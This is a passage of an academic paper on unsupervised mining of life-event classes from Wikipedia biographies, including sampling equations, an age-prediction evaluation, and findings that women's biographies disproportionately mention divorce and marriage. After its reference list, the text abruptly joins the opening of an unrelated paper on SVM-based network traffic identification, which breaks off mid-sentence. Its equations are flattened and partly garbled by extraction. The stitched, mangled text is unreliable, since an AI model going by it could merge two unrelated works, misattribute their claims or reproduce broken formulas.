fixed biography-event class proportions η, observed tokens w, timestamp t, and current samples z− for all other events, the proba- bility of a given event belonging to event class k is as follows: P(z = k | z−,w,t,η,γ,µ,σ2) ∝ exp(ηk) ×σ−1k exp ( −(t−µk) 2 2σ2k ) × ∏V v=1 ∏e(v) i=1 (γ + c −(k,v) + i− 1) ∏Ne n=1 (V γ + c −(k,?) + n− 1) (1) Here c−(k,v) is the count of the number of times vocabulary term v shows up in all events whose cur- rent sample z = k (excepting the current one being sampled), c−(k,?) is the total count of all terms in all events whose current z = k (again excepting the current one), Ne is the number of terms in event e, and e(v) is the count of vocabulary term v in the cur- rent event. (Note the complexity of the last term is due to drawing multiple observations from a single collapsed multinomial; Carpenter, 2010.) Maximizing η. Under our model, the terms in the likelihood function that involve η include the likeli- hood of the samples drawn from it and its own prob- ability given the multivariate Normal prior: L(η) ∝ N∏ n=1 exp(ηzn )∑K k=1 exp(ηk) ×N(η | µη, Ση) (2) The log likelihood is proportional to: `(η) ∝ N∑ n=1 ηzn − N∑ n=1 K∑ k=1 exp(ηk) −1 2 (η −µη)> Σ−1η (η −µη) (3) Given samples of the latent event class z for all events in biography p, we maximize the value of ηp using gradient ascent. We can think of this as maxi- mizing the likelihood of the observations z subject to `2 (Gaussian) regularization, where the covariance 366 matrix in the regularizer encourages correlations in η: if a document contains many examples of z = k and zk is highly correlated with zj, then the optimal η is encouraged to contain high weights at both ηk and ηj rather than simply ηk alone. Maximizing µη, Ση,µ,σ2. Given values for η, we then find maximum a posteriori estimates of µη and Ση conditioned on the Normal-Inverse Wishart (NIW) prior. The NIW is a conjugate prior to a mul- tivariate Gaussian, parameterized by dimensionality K, initial mean µ0, positive-definite scale matrix Ψ, and scalars ν > K − 1 and λ > 0. The prior parameters Ψ and ν have an intuitive interpretation as the scatter matrix ∑ν i=1 (xi − x̄) (xi − x̄) > for ν pseudo-observations. The expected value of the covariance matrix drawn from a NIW distribution parameterized by Ψ and ν is Ψ ν−K−1 . To disprefer correlations among topics in the absence of strong evidence, we fix µ0 = 0 and set Ψ so that this prior expectation over Ση is the product of a scalar value ρ and the iden- tity matrix I: Ψ = (ν − K − 1)ρI; ρ defines the expected variance, and the higher the value of ν, the more strongly the prior dominates the posterior es- timate of the covariance matrix (i.e., the more the covariance matrix is shrunk toward ρI). λ likewise has an intuitive understanding as a dampening pa- rameter: the higher its value, the more the posterior estimate of the mean µ̂ shrinks toward 0. For n data points, we set λ = n/10, ν = K + 2, and ρ = 1. Since the NIW is conjugate with the multivariate normal, posterior updates to µη and Ση have closed- form expressions given values of η (here, η̄ denotes the mean value of η over all biographies). µ̂η = n λ + n η̄ (4) Σ̂η = Ψ + ∑N i=1 (ηi − η̄) (ηi − η̄) > + λn λ+n η̄η̄> ν + n + K + 1 (5) Since we have no meaningful prior information on the values of µ and σ2, we calculate their maximum likelihood estimate given current samples z. 4 Evaluation While the goal of this work is to learn qualitative categories of life events from text, we can quantita- tively evaluate the performance of our model on the empirical task of predicting the age in a person’s life when an event occurs. For this task, we compare the full model described above with a strong baseline of `2-regularized linear regression and also with comparable models with feature ablations, in order to quantify the extent to which various aspects of the full model are con- tributing to its empirical performance. The compa- rable ablated models include the following: • –CORRELATION, figure 1b. Rather than a lo- gistic normal prior on the entity-specific distri- bution over event types (η), we draw η from a symmetric Dirichlet distribution parameterized by a global α. In a Dirichlet distribution, arbi- trary correlations cannot be captured. • –TIME, figure 1c. In the full model, the time- stamps of the observed events influence the event classes we learn by encouraging them to be internally coherent and time-sensitive. To test this design choice, we ablate time as a fea- ture during inference. • –CORRELATION,–TIME, figure 1d. We also test a model that ablates both the correlation structure in the prior and the influence of time; this model corresponds to smoothed, unsuper- vised naı̈ve Bayes. As during inference, we define an event to be the set of terms, excluding stopwords and numbers, that are present in the vocabulary of the 10,000 most fre- quent words and multiword expressions in the data overall. Each event is accompanied by the year of its occurrence, from which we calculate the gold target prediction (the age of the person at the time of the event) as the year minus the entity’s year of birth. For all of the four models described above (the full model and three ablations), we train the model on 4/5 of the biographies (194,376 entities, on average 1,851,094 events); we split the remaining 1/5 of the biographies into development data (where t is ob- served) and test data (where t is predicted). The de- tails of inference for each model are as follows: 1. FULL. Inference as above for a burn-in period of 100 iterations, using slice sampling (Neal, 2003) to optimize the value of the Dirichlet hy- perparameter γ every 10 iterations; after infer- ence, the parameters µη, Ση,µ,σ2 and φ are es- 367 timated from samples drawn at the final itera- tion and held fixed. For test entities, we infer the MAP value of η using development data, and predict the age of each test event as the mean time marginalizing over the event type in- dicator z. t̂ = Ez[µz]. 2. –CORRELATION. Here we perform collapsed Gibbs sampling for 100 iterations, using slice sampling to optimize the value of α and γ ev- ery 10 iterations; after inference, the parame- ters µ,σ2 and φ are estimated from single final samples and held fixed. For development and test data, we run Gibbs sampling on event indi- cators z for 10 iterations and predict the age of each test event as the mean time marginalizing over the event type indicator z. t̂ = Ez[µz]. 3. –TIME. Inference as above for 100 iterations, using slice sampling to optimize the value of γ every 10 iterations; after inference, the pa- rameters µη, Ση and φ are estimated from sin- gle final samples and held fixed. Since time is not known to this model during inference, we create post hoc estimates of µ̂z as the empirical mean age of events sampled to event class z us- ing single samples for each event in the training data from the final sampling iteration. For test entities, we infer the MAP value of η using de- velopment data, and predict the age of each test event as the average empirical age marginaliz- ing over the event type indicator z. t̂ = Ez[µ̂z]. 4. –CORRELATION,–TIME. We perform infer- ence as above for the –CORRELATION model, and time prediction as in the –TIME model. t̂ = Ez[µ̂z]. To compare against a potentially more powerful discriminative model, we also evaluate linear regres- sion with `2 (ridge) regularization, using binary indi- cators of the same unigrams and multiword expres- sions available to the models above. 5. LINEAR REGRESSION. Train on training and development data, optimizing the regulariza- tion coefficient λ in three-fold cross-validation. During training, linear regression learns that the terms most indicative of events that take place later in life are stamp, descendant, commemorated, died, plaque, grandson, and lifetime achievement award, while those that denote early events are born, bap- tised, apprenticed, and acting debut. We evaluate all models on identical splits using 5-fold cross validation. For an interpretable error score, we use mean absolute error, which corre- sponds to the number of years, on average, by which each model is incorrect. MAE = 1 N N∑ i=1 ∣∣t̂− ti ∣∣ (6) Figure 2 presents the results of this evaluation for all models and different choices of the number of latent event classes K ∈ {10, 25, 50, 100, 250, 500}. Lin- ear regression represents a powerful model, achiev- ing a mean absolute error of 11.87 years across all folds, but is eclipsed by the latent variable model at K ≥ 50. The correlations captured by the logis- tic normal prior make a clear difference, uniformly yielding improvements over otherwise equivalent Dirichlet models across all K. As expected, mod- els trained without knowledge of time during infer- ence perform less well than models that contain that information. 12 13 14 10 25 50 100 250 500 Number of event classes (log scale) M ea n ab so lu te e rr or ( ye ar s) Model Linear Regression Full Model Ablation: -Time Ablation: -Correlation Ablation: -Correlation, -Time Figure 2: Mean average error (in years) for time pre- diction. 5 Analysis To analyze the latent event classes in Wikipedia bi- ographies, we train our full model (with a logis- tic normal prior and time as an observable vari- able) on the full dataset of 242,970 biographies with 368 Age µ Age σ % Fem. Most probable terms in class 18.00 0.67 15.6% high school, graduated, attended, graduating, school, born, early life, class, grew 21.89 1.83 0.2% drafted, nfl draft, round, professional career, draft, overall, selected 22.27 1.19 17.6% graduated, bachelor, degree, university, received, college, attended, earned, b. a. 22.67 4.33 3.6% joined, enlisted, army, served, world war ii, united states army, years, corps 25.81 3.47 11.1% law, university, graduated, received, school, law school, degree, law degree 32.32 8.19 12.0% thesis, received, university, phd, dissertation, doctorate, degree, ph. d., completed 38.24 15.29 17.0% citizen, became, citizenship, united states, american, u. s., british, granted, since 39.33 12.53 39.4% divorce, marriage, divorced, married, filed, wife, separated, years, ended, later 42.57 13.78 16.3% university, teaching, professor, college, taught, faculty, school, department, joined 43.79 15.54 13.8% trial, murder, case, court, charges, guilty, jury, judge, death, convicted 45.89 18.71 13.3% died, accident, killed, death, near, crash, car, involved, car accident, injured 46.22 16.30 11.2% prison, released, years, sentence, sentenced, months, parole, federal, serving 49.81 10.28 7.0% governor, candidate, unsuccessful candidate, congress, ran, reelection 51.41 11.23 1.2% bishop, appointed, archbishop, diocese, pope, consecrated, named, cathedral 54.91 12.04 7.9% chairman, board, president, ceo, became, company, directors, appointed, position 59.06 14.17 16.9% awarded, university, received, honorary doctorate, honorary degree, degree, doctor 62.81 24.16 11.1% fame, inducted, hall, sports hall, elected, national, football hall, international 72.52 13.69 12.4% died, hospital, age, death, complications, cancer, home, heart attack, washington 92.39 46.06 13.0% national, historic, park, state, house, named, memorial, home, honor, museum 95.29 42.65 12.1% statue, unveiled, memorial, plaque, anniversary, erected, monument, death, bronze Table 2: Salient event classes learned from 242,970 Wikipedia biographies. All 500 event classes can be viewed at http://www.ark.cs.cmu.edu/bio. K = 500 event classes; as above, we run inference for a burn-in period of 100 iterations and collect 50 samples from the posterior distributions for z (the event class indicator for each event). Table 2 illustrates a sample of 20 event classes along with the mean time µ and standard deviation σ, the gender distribution (calculated from the poste- rior distribution over z for all entities whose gender is known3) and the most probable terms in the class. The latent classes that we learn span a mix of ma- jor life events of Wikipedia notable figures (includ- ing events that we might characterize as GRADU- ATING HIGH SCHOOL, BECOMING A CITIZEN, DI- VORCE, BEING CONVICTED OF A CRIME, and DY- ING) and more fine-grained events (such as BE- ING DRAFTED BY A SPORTS TEAM and BEING IN- DUCTED INTO THE HALL OF FAME). Emerging immediately from this summary is an imbalance in the gender distribution for many of these event classes. Among the 242,858 biographies whose gender is known, 14.8% are of women; we would therefore expect around 14.8% of the partic- 3Using our method of gender inference described in §2, we are able to infer gender for 99.95% of biographies (242,858). ipants in most event classes to be female. Figures 3 and 4 illustrate five of the most highly skewed classes in both directions, ranked according to the z score of a two-tailed binomial proportion test (H0 = 14.8). While some of these classes reflect a biased world in which more men are drafted into sports teams, serve in the armed forces, and are ordained as priests, one latent class that calls out for explanation is that surrounding DIVORCE (divorce, marriage, di- vorced, filed, married, wife, separated, years, ended, later), whose female proportion of 39.4% is nearly triple that of the data overall (and whose z-score re- veals it to be strongly statistically different [p � 0.0001] from the H0 mean, even accounting for the Bonferroni correction we must make when consider- ing the K = 500 tests we implicitly perform when ranking). While we did not approach this analy- sis with any a priori hypotheses to test, our unsu- pervised model reveals an interesting hypothesis to pursue with confirmatory analysis: biographies of women on Wikipedia disproportionately focus on marriage and divorce compared to those of men. To test this hypothesis with more traditional 369 z %Fem. Most frequent terms 60.46 76.9% miss, pageant, title, usa, miss universe, beauty, held, teen, crowned, competed 57.21 49.9% birth, gave, daughter, son, born, first child, named, wife, announced, baby 55.63 59.8% fashion, model, show, campaign, week, appeared, face, career, became, modeling 37.89 39.4% divorce, marriage, divorced, married, filed, wife, separated, years, ended, later 36.70 36.5% summer olympics, competed, olympics, team, finished, event, final, world championships Table 3: Female-skewed event classes, ranked by z-score in a two-tailed binomial proportion test. z %Fem. Most frequent terms -31.64 0.2% drafted, nfl draft, round, professional career, draft, overall, selected, major league baseball -23.81 2.1% promoted, rank, captain, retired, army, lieutenant, colonel, major, brigadier general -20.93 3.7% bar, admitted, law, practice, called, commenced, studied, began, career, practiced -20.48 1.0% infantry, civil war, regiment, army, enlisted, served, company, colonel, captain -20.30 1.7% ordained, priest, seminary, priesthood, theology, theological, college, studies, rome Table 4: Male-skewed event classes, ranked by z-score in a two-tailed binomial proportion test. means, we estimated the empirical gender propor- tions of biographies containing terms explicitly de- noting divorce (divorced, divorce, divorces and di- vorcing). The result of this analysis confirms that of the model. Of the 4,608 biographies in which at least one of these terms appears, 38.8% are those of a woman, far more than the 14.8% we would expect (in a two-tailed binomial proportion test against H0 = 14.8, this difference is significant at p < 0.0001); this corresponds to divorce being mentioned in 5.0% of all 35,932 women’s biogra- phies, and 1.4% of all 206,926 men’s; on average, a woman’s biography is 3.66 times more likely to mention divorce than a man’s. We repeat the gender proportion experiment with terms denoting marriage (married, marry, marries, marrying and marriage) and find a similar trend: of the 39,142 biographies where at least one of these terms is mentioned, 23.6% belong to women; again, in a two-tailed proportion test, this difference is sig- nificant at p < 0.0001. This corresponds to marriage appearing in 25.7% of all women’s biographies, and 14.5% of men’s; a woman’s biography is 1.78 times more likely to mention marriage than a man’s. 6 Additional Analyses The analysis above represents one substantive result that mining life events from biographical data makes possible. To illustrate the range of other analyses that this method can occasion, we briefly present two other directions that can be pursued: investigating correlations among event classes and the distribution of event classes over historical time. 6.1 Correlations among events In our full model with a logistic normal prior over a document’s set of events, correlations among latent event classes are learned during inference. From the covariance matrix Ση, we can directly read off cor- relations among events; for other models (such as those with a Dirichlet prior), we can infer correla- tions using the posterior estimates for η. Table 5 illustrates the event classes that have the highest correlations to the event class defined by family, boss, murder, crime, mafia, became, ar- rested, john, gang, chicago. The structure that we learn here neatly corresponds to a CRIMINAL AC- TION frame, with common events for KILLING, BE- ING SUBJECT TO FEDERAL INVESTIGATION, BE- ING ARRESTED and BEING BROUGHT TO TRIAL. 6.2 Historical distribution of events Figure 3 likewise illustrates the distribution over time for a set of learned event classes. While the only notion of time that our model has access to during inference is that of time relative to a per- son’s birth, we can estimate the empirical distribu- tion of event classes in historical time by charting the density plot of their observed absolute dates. Sev- eral historically relevant event classes are legible, including SERVING IN THE ARMY (with peaks dur- 370 0.00 0.01 0.02 0.03 0.04 1800 1850 1900 1950 2000 joined, enlisted, army, served, world war ii 0.000 0.003 0.006 0.009 0.012 1800 1850 1900 1950 2000 joined, became, member, party, communist party 0.000 0.003 0.006 0.009 1800 1850 1900 1950 2000 opera, debut, made, sang, la, role, di, metropolitan opera 0.000 0.005 0.010 1800 1850 1900 1950 2000 river, expedition, fort, near, led, territory 0.000 0.005 0.010 0.015 0.020 1800 1850 1900 1950 2000 space, nasa, mission, flight, center, program 0.00 0.01 0.02 0.03 0.04 1800 1850 1900 1950 2000 band, guitar, bass, formed, album, drums, guitarist Figure 3: Historical distributions of event classes. r Event class 1.000 family, boss, murder, crime, mafia, became, arrested, john, gang, chicago 0.031 killed, shot, police, home, two, car, ar- rested, murder, death, -year-old 0.028 trial, murder, case, guilty, court, jury, charges, convicted, death, judge 0.021 investigation, federal, charges, office, fraud, campaign, state, commission, former, cor- ruption 0.019 arrested, sentenced, years, prison, trial, death, court, convicted, military, months Table 5: Highest correlations between the family, boss, murder, crime, mafia class and other events. ing World War I and II, Vietnam and the later Iraq wars), OPERA DEBUT (with peaks in the 1950s), NASA (with peaks in 1960s and the turn of the mil- lenium), JOINING THE COMMUNIST PARTY (with a rise in the early 20th century), LEADING AN EXPE- DITION (with a slow historical decline) and JOIN- ING A BAND (with increasing historical presence). Grounding specific life events in history has the po- tential to enable analysis of how historical time af- fects the life histories of individuals—including both the influence of the general passage of time, as on transitions to adulthood (Modell et al., 1976; Hogan, 1981; Modell, 1980), and the influence of specific historical moments like the Great Depression (Elder, 1974) or World War II (Mayer, 1988; Elder, 1991). 7 Related Work In learning general classes of events from text, our work draws on a rich background spanning several research traditions. By considering the structure that exists between event classes, we draw on the origi- nal work on procedural scripts and schemas (Min- sky, 1974; Schank and Abelson, 1977) and narra- tive chains (Chambers and Jurafsky, 2008; Cham- bers and Jurafsky, 2009), including more recent ad- vances in the unsupervised learning of frame seman- tic representations (Modi et al., 2012; O’Connor, 2013; Cheung et al., 2013; Chambers, 2013). In learning latent classes from text, our work is also clearly related to research on topic modeling (Blei et al., 2003; Griffiths and Steyvers, 2004). This work differs from that tradition by scoping our data only over text that we have reason to be- lieve describes events (by including absolute dates). While other topic models have leveraged temporal information in the learning of latent topics, such as the dynamic topic model (Blei and Lafferty, 2006b; Wang et al., 2012) and “topics over time” (Wang and McCallum, 2006), our model is the first to in- fer classes of events whose contours are shaped by the time in a person’s life that they take place. While the information extraction tasks of template filling (Hobbs et al., 1993) and relation detection (Banko et al., 2007; Fader et al., 2011; Carlson et al., 2010) generally fall into a paradigm of classifying 371 text segments into a predetermined ontology, they too have been informed by unsupervised approaches to learning relation classes (Yao et al., 2011) and events (Ritter et al., 2012). Our work here differs from this past work in leveraging explicit absolute temporal information in the unsupervised learning of event classes (and their structure). Reasoning about the temporal ordering of events likewise has a long tradition of its own, both in NLP (Pustejovsky et al., 2003; Mani et al., 2006; Verhagen et al., 2007; Chambers et al., 2007) and information extraction (Talukdar et al., 2012). Rather than attempting to model the ordering of events relative to each other, we focus instead on their occurrence relative to the beginning of a person’s life. Wikipedia likewise has been used extensively in NLP; Wikipedia biographies in particular have been used for the task of training summarization models (Biadsy et al., 2008), recognizing biographical sen- tences (Conway, 2010), learning correlates of “suc- cess” (Ng, 2012), and disambiguating named enti- ties (Bunescu and Pasca, 2006; Cucerzan, 2007). In our work in mining biographical structure from it, we draw on previous research into automatically uncovering latent structure in resumés (Mimno and McCallum, 2007a) and approaches to learning life path trajectories from categorical survey data (Mas- soni et al., 2009; Ritschard et al., 2013). In using Wikipedia as a dataset for analysis, we must note that the subjects of biographies are not a representative sample of the population, nor are their contents unbiased representations. Nearly all ency- clopedias necessarily prefer the historically notori- ous (if due to nothing else than inherent biases in the preservation of historical records); many, like Wiki- pedia, also have disproportionately low coverage of women, minorities, and other demographic groups, in part because of biases in community member- ship. Estimates of the percentage of female edi- tors on Wikipedia, for example, ranges from 9% to 16.1% (Collier and Bear, 2012; Reagle and Rhue, 2011; Cassell, 2011; Hill and Shaw, 2013; Wiki- pedia, 2011). Different language editions of Wiki- pedia have a natural geographic bias in article se- lection (Hecht and Gergle, 2009), with each empha- sizing their own “local heroes” (Kolbitsch and Mau- rer, 2006), and also differ in the kind of information they present (Pfeil et al., 2006; Callahan and Her- ring, 2011). This extends to selection of biographies as well, with one study finding approximately 16% of 1000 sampled biographies being those of women (Reagle and Rhue, 2011), a figure very close to the 14.8% we observe in our analysis here. 8 Conclusion We present a method for mining life events from biographies, leveraging the correlation structure of event descriptions. Unlike prior work that has fo- cused on inferring “life trajectories” from categor- ical survey data, we learn relevant structure in an unsupervised manner directly from text, opening the door to applying this method to a broad set of biogra- phies beyond Wikipedia (including full-text books from the Internet Archive or Hathi Trust, and other encyclopedic biographies as well). In a quantitative analysis, the model we present outperforms a strong baseline at the task of event time prediction, and sur- faces a substantive qualitative distinction in the con- tent of the biographies of men and women on Wiki- pedia: in contrast to previous work that uses com- putational methods to measure a difference in cov- erage, we show that such methods are able to tease apart differences in characterization as well. While the task of event time prediction provides a quantitative means to compare different models, we expect the real application of this work will lie in the latent event classes themselves, and the in- formation they provide both about the subjects and authors of biographies. Latent topics have provided one way of organizing large document collections in the past (Mimno and McCallum, 2007b); in ad- dition to occasioning data analysis of the kind we describe here, we expect that personal event classes can have a practical application in helping to orga- nize data describing people as well. Data and code to support this work, including an interface to ex- plore event classes in Wikipedia, can be found at http://www.ark.cs.cmu.edu/bio/. 9 Acknowledgments We thank the anonymous reviewers, along with Dallas Card, Brendan O’Connor, Bryan Routledge, Yanchuan Sim and Ted Underwood, for their help- ful comments. The research reported in this arti- cle was supported by U.S. National Science Foun- 372 dation grant CAREER IIS-1054319 to N.A.S. and Google’s support of the Reading is Believing project at CMU. This work was made possible through the use of computing resources made available by the Open Science Data Cloud (OSDC), an Open Cloud Consortium (OCC)-sponsored project. References David Bamman, Ted Underwood, and Noah A. Smith. 2014. A Bayesian mixed effects model of literary character. In ACL. Michele Banko, Michael J Cafarella, Stephen Soderland, Matthew Broadhead, and Oren Etzioni. 2007. Open information extraction for the web. In IJCAI, vol- ume 7, pages 2670–2676. Fadi Biadsy, Julia Hirschberg, and Elena Filatova. 2008. An unsupervised approach to biography production using Wikipedia. In ACL ’08, pages 807–815. David M. Blei and John D. Lafferty. 2006a. Correlated topic models. In NIPS ’06. David M. Blei and John D. Lafferty. 2006b. Dynamic topic models. In ICML ’06, pages 113–120. David M. Blei and John D. Lafferty. 2007. A correlated topic model of Science. AAS, 1(1):17–35. David M. Blei, Andrew Ng, and Michael Jordan. 2003. Latent dirichlet allocation. JMLR, 3:993–1022. Razvan Bunescu and Marius Pasca. 2006. Using ency- clopedic knowledge for named entity disambiguation. In EACL ’06, pages 9–16, Trento, Italy. Ewa S. Callahan and Susan C. Herring. 2011. Cultural bias in Wikipedia content on famous persons. J. Am. Soc. Inf. Sci. Technol., 62(10):1899–1915, October. Andrew Carlson, Justin Betteridge, Bryan Kisiel, Burr Settles, Estevam R. Hruschka Jr., and Tom M. Mitchell. 2010. Toward an architecture for never- ending language learning. In AAAI ’10. Bob Carpenter. 2010. Integrating Out Multinomial Parameters in Latent Dirichlet Allocation and Naive Bayes for Collapsed Gibbs Sampling. Technical re- port, LingPipe. Justine Cassell. 2011. Editing wars behind the scenes. New York Times, February 4. Nathanael Chambers and Dan Jurafsky. 2008. Unsuper- vised learning of narrative event chains. In ACL ’08. Nathanael Chambers and Dan Jurafsky. 2009. Unsuper- vised learning of narrative schemas and their partici- pants. In ACL ’09, pages 602–610. Nathanael Chambers, Shan Wang, and Dan Jurafsky. 2007. Classifying temporal relations between events. In Proceedings of the 45th Annual Meeting of the ACL on Interactive Poster and Demonstration Sessions, ACL ’07, pages 173–176, Stroudsburg, PA, USA. As- sociation for Computational Linguistics. Nathanael Chambers. 2013. Event schema induction with a probabilistic entity-driven model. In EMNLP ’13, pages 1797–1807, Seattle, Washington, USA, Oc- tober. Association for Computational Linguistics. Jackie Chi Kit Cheung, Hoifung Poon, and Lucy Van- derwende. 2013. Probabilistic frame induction. In NAACL ’13, pages 837–846, Atlanta, Georgia, June. Association for Computational Linguistics. Benjamin Collier and Julia Bear. 2012. Conflict, criti- cism, or confidence: An empirical examination of the gender gap in Wikipedia contributions. In CSCW ’12. Mike Conway. 2010. Mining a corpus of biographical texts using keywords. Literary and Linguistic Com- puting, 25(1):23–35. Silviu Cucerzan. 2007. Large-scale named entity dis- ambiguation based on wikipedia data. In EMNLP- CoNLL, volume 7, pages 708–716. Peter T. Davis, David K. Elson, and Judith L. Klavans. 2003. Methods for precise named entity matching in digital collections. In JCDL ’03. Glen Elder. 1974. Children of the Great Depression. University of Chicago Press. Glen Elder. 1991. Talent, history, and the fulfillment of promise. Psychiatry, 54(3):251–267. David K. Elson, Nicholas Dames, and Kathleen R. McK- eown. 2010. Extracting social networks from literary fiction. In ACL ’10, pages 138–147. Anthony Fader, Stephen Soderland, and Oren Etzioni. 2011. Identifying relations for open information ex- traction. In EMNLP ’11, EMNLP ’11, pages 1535– 1545, Stroudsburg, PA, USA. Association for Compu- tational Linguistics. Jenny Rose Finkel, Trond Grenager, and Christopher Manning. 2005. Incorporating non-local informa- tion into information extraction systems by Gibbs sam- pling. In ACL ’05, pages 363–370. Google. 2014. Freebase data dumps. https:// developers.google.com/freebase/data. Thomas L Griffiths and Mark Steyvers. 2004. Find- ing scientific topics. Proceedings of the National Academy of Sciences of the United States of America, 101(Suppl 1):5228–5235. Brent Hecht and Darren Gergle. 2009. Measuring self-focus bias in community-maintained knowledge repositories. In C&T ’09, pages 11–20. Benjamin Mako Hill and Aaron Shaw. 2013. The Wiki- pedia gender gap revisited: Characterizing survey re- sponse bias with propensity score estimation. PLoS ONE, 8(6). Jerry R Hobbs, Douglas Appelt, John Bear, David Israel, Megumi Kameyama, and Mabry Tyson. 1993. Fas- tus: A system for extracting information from text. 373 In Proceedings of the workshop on Human Language Technology, pages 133–137. Association for Compu- tational Linguistics. Dennis P. Hogan and Nan Marie Astone. 1986. The transition to adulthood. Annual Review of Sociology, 12(1):109–130. Dennis Hogan. 1981. Transitions and Social Change: The Early Lives of American Men. Academic, New York. John S Justeson and Slava M Katz. 1995. Technical ter- minology: some linguistic properties and an algorithm for identification in text. Natural Language Engineer- ing, 1(1):9–27. Josef Kolbitsch and Hermann A. Maurer. 2006. The transformation of the web: How emerging commu- nities shape the information we consume. J. UCS, 12(2):187–213. Lee A. Lillard and Linda J. Waite. 1993. A joint model of marital childbearing and marital disruption. Demogra- phy, 30(4):pp. 653–681. Lee A. Lillard, Michael J. Brien, and Linda J. Waite. 1995. Premarital cohabitation and subsequent marital dissolution: A matter of self-selection? Demography, 32(3):pp. 437–457. Inderjeet Mani, Marc Verhagen, Ben Wellner, Chong Min Lee, and James Pustejovsky. 2006. Machine learning of temporal relations. In Proceedings of the 21st In- ternational Conference on Computational Linguistics and the 44th Annual Meeting of the Association for Computational Linguistics, ACL-44, pages 753–760, Stroudsburg, PA, USA. Association for Computational Linguistics. Sébastien Massoni, Madalina Olteanu, and Patrick Rous- set. 2009. Career-path analysis using optimal match- ing and self-organizing maps. In WSOM ’09. Henry Colin Gray Matthew and Brian Harrison. 2004. The Oxford dictionary of national biography. Oxford University Press. Karl Ulrich Mayer. 1988. German survivors of World War II: The impact on the life course of the collective experience of birth cohorts. In Social Structure and Human Lives, Newbury Park. Sage. David Mimno and Andrew McCallum. 2007a. Model- ing career path trajectories. Technical Report 2007-69, University of Massachusetts, Amherst. David Mimno and Andrew McCallum. 2007b. Organiz- ing the OCA: Learning faceted subjects from a library of digital books. In JCDL ’07, pages 376–385, New York, NY, USA. ACM. David Mimno, Hanna M. Wallach, and Andrew McCal- lum. 2008. Gibbs sampling for logistic normal topic models with graph-based priors. In NIPS Workshop on Analyzing Graphs. Marvin Minsky. 1974. A framework for representing knowledge. Technical report, MIT-AI Laboratory. John Modell, Frank F. Furstenberg Jr., and Theodore Her- shberg. 1976. Social change and transitions to adult- hood in historical perspective. Journal of Family His- tory, 1(1):7–32. John Modell. 1980. Normative aspects of american mar- riage timing since World War II. Journal of Family History, 5(2):210–234. Ashutosh Modi, Ivan Titov, and Alexandre Klemen- tiev. 2012. Unsupervised induction of frame-semantic representations. In Proceedings of the NAACL-HLT Workshop on the Induction of Linguistic Structure, WILS ’12, pages 1–7, Stroudsburg, PA, USA. Asso- ciation for Computational Linguistics. Radford M Neal. 2003. Slice sampling. Annals of Statis- tics, pages 705–741. Pauline Ng. 2012. What Kobe Bryant and Britney Spears have in common: Mining Wikipedia for characteristics of notable individuals. In ICWSM ’12. Brendan O’Connor. 2013. Learning frames from text with an unsupervised latent variable model. ArXiv, abs/1307.7382. Ulrike Pfeil, Panayiotis Zaphiris, and Chee Siang Ang. 2006. Cultural differences in collaborative authoring of Wikipedia. Journal of Computer-Mediated Com- munication, 12(1):88–113. James Pustejovsky, Patrick Hanks, Roser Sauri, Andrew See, Robert Gaizauskas, Andrea Setzer, Dragomir Radev, Beth Sundheim, David Day, Lisa Ferro, et al. 2003. The timebank corpus. In Corpus linguistics, volume 2003, page 40. Joseph Reagle and Lauren Rhue. 2011. Gender bias in Wikipedia and Britannica. International Journal of Communication, 5(0). Steffen Reinhold. 2010. Reassessing the link between premarital cohabitation and marital instability. De- mography, 47(3):719–733. Gilbert Ritschard, Reto Bürgin, and Matthias Studer. 2013. Exploratory mining of life event histories. In J. J. McArdle and G. Ritschard, editors, Contemporary Issues in Exploratory Data Mining in the Behavioral Sciences, pages 221–253. Routledge, New York. Alan Ritter, Mausam, Oren Etzioni, and Sam Clark. 2012. Open domain event extraction from Twitter. In KDD ’12, pages 1104–1112, New York, NY, USA. ACM. Roger C. Schank and Robert P. Abelson. 1977. Scripts, plans, goals, and understanding: An inquiry into hu- man knowledge structures. Lawrence Erlbaum, Hills- dale, NJ. Michael J. Shanahan. 2000. Pathways to adulthood in changing societies: Variability and mechanisms in 374 life course perspective. Annual Review of Sociology, 26(1):667–692. Partha Pratim Talukdar, Derry Wijaya, and Tom Mitchell. 2012. Acquiring temporal constraints between rela- tions. In CIKM ’12, pages 992–1001, New York, NY, USA. ACM. Kristina Toutanova, Dan Klein, Christopher D. Manning, and Yoram Singer. 2003. Feature-rich part-of-speech tagging with a cyclic dependency network. In NAACL ’03, pages 173–180. Marc Verhagen, Robert Gaizauskas, Frank Schilder, Mark Hepple, Graham Katz, and James Pustejovsky. 2007. Semeval-2007 task 15: Tempeval temporal re- lation identification. In Proceedings of the 4th Interna- tional Workshop on Semantic Evaluations, pages 75– 80. Association for Computational Linguistics. Xuerui Wang and Andrew McCallum. 2006. Topics over time: a non-markov continuous-time model of topical trends. In KDD ’06, pages 424–433. Chong Wang, David M. Blei, and David Heckerman. 2012. Continuous time dynamic topic models. ArXiv. Wikipedia. 2011. Wikipedia editors study: Results from the editor survey. Limin Yao, Aria Haghighi, Sebastian Riedel, and Andrew McCallum. 2011. Structured relation discovery using generative models. In EMNLP ’11, pages 1456–1466, Stroudsburg, PA, USA. Association for Computational Linguistics. 375 376 work_657azxnanzf5not3eq7kgvht6e ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-006 53 A New Method of Improving the Traditional Traffic Identification and Accuracy Wang Zhongsheng School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, Shaanxi, China e-mail: wzhsh1681@163.com Gao Jiaqiong Department of ComputerScience SichuanVocational andTechnicalCollege Suining, 629000, Sichuan, China e-mail: 516719510@qq.com Abstract—As the traffic generated by the increasing number of applications on the Internet is becoming more and more complex, how to improve the quality of service and security of the network is also increasingly important. This paper studies the application of Support Vector Machine (SVM) in traffic identification to classify network traffic. Through data collection and feature generation methods and network traffic feature screening methods, SVM is used as a classifier by using the generalization capability, and the parameters and the kernel functions of SVM are adjusted and selected based on cross comparison ideas and methods. Using the cross-validation method to make the most reasonable statistics for the classification and recognition accuracy of the adjusted support vector machine avoids the situation that the classification accuracy of the support vector machine is unstable or the statistics are inaccurate. Finally, a traffic classification and identification system based on SVM is implemented. The final recognition rate of encrypted traffic is up to 99.31%, which overcomes the disadvantages of traditional traffic identification and achieves a fairly reliable accuracy. Keywords-Support Vector Machine (SVM); Traffic Classification; Feature Extraction; Kernel Function I. INTRODUCTION Due to the rapid development of the Internet, Internet business has greatly facilitated and enriched people's lives, learning and work, and has attracted more and more users. With the new application patterns (such as P2P) and application demand emerging in the Internet[1], the pressure of huge data transmission is becoming more and more heavy, and the occurrence of network failures is becoming more and more frequent, which leads to a series of network failures, such as packet loss, network congestion, and time delay in the process of data transmission. The maneuverability of the network is 